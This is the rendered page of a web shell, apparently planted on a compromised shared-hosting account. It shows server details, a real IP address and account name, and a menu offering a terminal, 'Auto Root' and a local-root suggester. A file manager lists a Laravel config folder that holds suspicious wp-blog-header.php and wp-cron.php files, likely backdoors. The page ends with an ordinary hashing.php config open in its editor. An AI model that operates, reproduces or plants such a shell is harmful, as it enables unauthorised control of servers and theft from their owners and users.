Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
app.php
9.12
KB
-rwxrwxrwx
2024-11-02 06:21
auth.php
3.83
KB
-rwxrwxrwx
2024-06-30 18:36
broadcasting.php
1.62
KB
-rwxrwxrwx
2024-06-30 18:36
cache.php
3.13
KB
-rwxrwxrwx
2024-06-30 18:36
cors.php
877
B
-rwxrwxrwx
2024-08-05 09:59
current.php
22
B
-rw-r--r--
2026-04-01 01:39
database.php
5.08
KB
-rwxrwxrwx
2024-06-30 18:36
dompdf.php
11.21
KB
-rwxrwxrwx
2024-11-02 06:21
error_log
12.15
KB
-rw-r--r--
2026-02-09 00:56
filesystems.php
2.71
KB
-rwxrwxrwx
2024-06-30 18:36
hashing.php
1.58
KB
-rwxrwxrwx
2024-06-30 18:36
logging.php
2.93
KB
-rwxrwxrwx
2024-06-30 18:36
mail.php
3.4
KB
-rwxrwxrwx
2024-06-30 18:36
permission.php
6.54
KB
-rwxrwxrwx
2024-06-30 18:36
queue.php
2.79
KB
-rwxrwxrwx
2024-06-30 18:36
sanctum.php
2.31
KB
-rwxrwxrwx
2024-06-30 18:36
services.php
981
B
-rwxrwxrwx
2024-06-30 18:36
session.php
7.07
KB
-rwxrwxrwx
2024-06-30 18:36
view.php
1.06
KB
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Hash Driver |-------------------------------------------------------------------------- | | This option controls the default hash driver that will be used to hash | passwords for your application. By default, the bcrypt algorithm is | used; however, you remain free to modify this option if you wish. | | Supported: "bcrypt", "argon", "argon2id" | */ 'driver' => 'bcrypt', /* |-------------------------------------------------------------------------- | Bcrypt Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Bcrypt algorithm. This will allow you | to control the amount of time it takes to hash the given password. | */ 'bcrypt' => [ 'rounds' => env('BCRYPT_ROUNDS', 10), ], /* |-------------------------------------------------------------------------- | Argon Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Argon algorithm. These will allow you | to control the amount of time it takes to hash the given password. | */ 'argon' => [ 'memory' => 1024, 'threads' => 2, 'time' => 2, ], ];